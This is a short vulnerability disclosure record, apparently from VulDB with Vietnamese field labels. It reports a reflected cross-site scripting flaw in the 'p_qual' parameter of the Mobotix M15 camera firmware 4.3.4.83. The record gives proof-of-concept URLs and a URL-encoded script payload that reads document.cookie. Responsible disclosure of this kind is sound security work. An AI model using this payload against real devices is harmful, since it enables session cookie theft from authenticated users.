| tiêu đề | Mobotix M15 MX-V4.3.4.83 Reflected Cross-Site Scripting |
|---|
| Mô tả | Hello team, how are you?
I found a Reflected Cross-Site Scripting in MOBOTIX M15, this vulnerability affects the "p_qual" parameter and you can steal cookies from authenticated users and execute arbitrary scripts.
PoC:
Vulnerable system:
http://x.x.x.x/control/player?center&eventlist&pda&dummy_for_reload=1736177631&p_evt=&p_qual=1%22%3E%3CScRiPt%20%3Ealert(document.cookie)%3C/ScRiPt%3E&p_size=
http://x.x.x.x:8002/control/player?center&eventlist&pda&dummy_for_reload=1736177631&p_evt=&p_qual=1%22%3E%3CScRiPt%20%3Ealert(document.cookie)%3C/ScRiPt%3E&p_size=
Payload:
%22%3E%3CScRiPt%20%3Ealert(document.cookie)%3C/ScRiPt%3E
Best regards |
|---|
| Nguồn | ⚠️ https://www.mobotix.com/ |
|---|
| Người dùng | Stux (UID 40142) |
|---|
| Đệ trình | 06/01/2025 21:09 (cách đây 1 Năm) |
|---|
| Kiểm duyệt | 19/01/2025 09:14 (13 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 292541 [Mobotix M15 4.3.4.83 p_qual Tập lệnh chéo trang] |
|---|
| điểm | 17 |
|---|